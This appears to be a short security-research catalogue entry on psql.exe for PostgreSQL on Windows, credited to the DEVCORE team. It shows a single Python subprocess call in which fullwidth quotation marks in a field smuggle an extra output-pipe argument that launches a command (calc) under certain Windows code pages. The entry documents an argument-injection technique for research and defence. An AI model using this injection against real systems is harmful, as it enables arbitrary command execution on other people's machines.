.. /psql.exe

Star

Vendors:

• PostgreSQL for Windows

Code Execution

1. You are able to inject pipe to execute arbitrary commands

   subprocess.run(['psql.exe', '-U', 'root', '-d', 'mydb＂ ＂-o＂ ＂|calc', '-c', 'SELECT 1;'])

   Use case

   If certain parts of the argument(s) are controllable, the attacker can inject additional arguments.

   Code Pages

   125x, 874

Acknowledgements:

• DEVCORE Research Team (@d3vc0r3)